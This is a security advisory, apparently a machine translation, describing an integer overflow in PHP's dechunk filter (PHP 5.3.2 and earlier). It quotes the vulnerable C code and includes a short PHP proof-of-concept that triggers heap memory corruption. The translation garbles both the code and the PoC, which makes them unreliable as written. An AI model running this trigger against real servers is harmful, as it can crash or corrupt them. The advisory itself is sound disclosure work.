PHP & amp; lt; = 5.3.2 php_dechunk () HTTP block encoding Integer Overflow Vulnerability

Affected Versions:
PHP <= 5.3.2
Vulnerability description:

PHP is a widely used scripting language. It is especially suitable for Web development and can be embedded into HTML.

The php_dechunk () function in the ext/standard/filters. c file of PHP has a symbolic error when processing HTTP streams. Memory Corruption can be triggered when processing ultra-large HTTP blocks through the dechunk filter.

The state machine in the new PHP dechunk filter uses the following structure to remember the current state:

Typedef struct _ php_chunked_filter_data {
Php_chunked_filter_state state;
Int chunk_size;
Int persistent;
} Php_chunked_filter_data;

Chunk_size is stored as an integer with a block size decoder, which may cause problems:

Case CHUNK_SIZE:
While (p <end ){
If (* p> = 0 & * p <= 9 ){
Data-> chunk_size = (data-> chunk_size * 16) + (* p-0 );
} Else if (* p> = A & * p <= F ){
Data-> chunk_size = (data-> chunk_size * 16) + (* p-A + 10 );
} Else if (* p> = a & * p <= f ){
Data-> chunk_size = (data-> chunk_size * 16) + (* p-a + 10 );
} Else if (data-> state = CHUNK_SIZE_START ){
Data-> state = CHUNK_ERROR;
Break;
} Else {
Data-> state = CHUNK_SIZE_EXT_START;
Break;
}
Data-> state = CHUNK_SIZE;
P ++;
}

The block size decoder does not prevent integer overflow. A positive 32-bit block size will cause a negative integer to be stored in the chunk_size state variable, and overflow will be triggered when the block size is compared with the remaining buffer space:

Case CHUNK_BODY:
If (end-p> = data-> chunk_size ){
If (p! = Out ){
Memmove (out, p, data-> chunk_size );
}
Out + = data-> chunk_size;
Out_len + = data-> chunk_size;
P + = data-> chunk_size;

Storing the negative block size in the chunk_size integer variable bypasses the check, resulting in copying 2 GB to 4 GB between two heap buffers. This usually only causes a crash, but may also cause memory corruption that can be exploited on a multi-threaded Web server. However, PHP is rarely used in multi-threaded environments. <* Reference
Http://secunia.com/advisories/39573/
Html> http://php-security.org/2010/05/02/mops-2010-003-php-dechunk-filter-signed-comparison-vulnerability/index.html
*>
Test method:

The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! <? Php
$ X = 0 fffffffe

XXX;
File_put_contents ("file: // tmp/test. dat", $ x );
$ Y = file_get_contents (php: // filter/read = dechunk/resource = file: // tmp/test. dat );
Echo "here ";
?> SEBUG Security suggestions:
Vendor patch:

PHP
---
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.php.net